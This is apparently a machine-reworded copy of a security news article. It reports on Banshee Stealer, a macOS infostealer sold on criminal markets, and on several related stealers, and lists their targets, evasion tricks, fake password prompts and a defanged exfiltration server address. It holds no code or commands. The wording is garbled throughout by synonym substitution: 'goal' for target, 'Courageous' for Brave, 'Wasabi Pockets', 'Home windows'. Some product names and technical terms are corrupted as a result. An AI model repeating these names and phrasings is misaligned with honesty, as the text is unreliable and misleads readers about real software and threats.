Cybersecurity researchers have uncovered new stealer malware that is designed to particularly goal Apple macOS methods.
Dubbed Banshee Stealer, it is supplied on the market within the cybercrime underground for a steep value of $3,000 a month and works throughout each x86_64 and ARM64 architectures.
“Banshee Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat,” Elastic Safety Labs stated in a Thursday report.
The online browsers and crypto wallets focused by the malware comprise Google Chrome, Mozilla Firefox, Courageous, Microsoft Edge, Vivaldi, Yandex, Opera, OperaGX, Exodus, Electrum, Coinomi, Guarda, Wasabi Pockets, Atomic, and Ledger.
It is also geared up to reap system info and knowledge from iCloud Keychain passwords and Notes, in addition to incorporate a slew of anti-analysis and anti-debugging measures to find out if it is working in a digital surroundings in an try to evade detection.
Moreover, it makes use of the CFLocaleCopyPreferredLanguages API to keep away from infecting methods the place Russian is the first language.
Like different macOS malware strains resembling Cuckoo and MacStealer, Banshee Stealer additionally leverages osascript to show a faux password immediate to trick customers into coming into their system passwords for privilege escalation.
Among the many different notable options embody the flexibility to gather knowledge from numerous recordsdata matching .txt, .docx, .rtf, .doc, .pockets, .keys, and .key extensions from the Desktop and Paperwork folders. The gathered knowledge is then exfiltrated in a ZIP archive format to a distant server (“45.142.122[.]92/send/”).
“As macOS increasingly becomes a prime target for cybercriminals, Banshee Stealer underscores the rising observance of macOS-specific malware,” Elastic stated.
The disclosure comes as Hunt.io and Kandji detailed one other macOS stealer pressure that leverages SwiftUI and Apple’s Open Listing APIs for capturing and verifying passwords entered by the person in a bogus immediate displayed with a purpose to full the set up course of.
“It begins by running a Swift-based dropper that displays a fake password prompt to deceive users,” Broadcom-owned Symantec stated. “After capturing credentials, the malware verifies them using the OpenDirectory API and subsequently downloads and executes malicious scripts from a command-and-control server.”
This growth additionally follows the continued emergence of latest Home windows-based stealers resembling Flame Stealer, at the same time as faux websites masquerading as OpenAI’s text-to-video synthetic intelligence (AI) instrument, Sora, are getting used to propagate Braodo Stealer.
Individually, Israeli customers are being focused with phishing emails containing RAR archive attachments that impersonate Calcalist and Mako to ship Rhadamanthys Stealer.
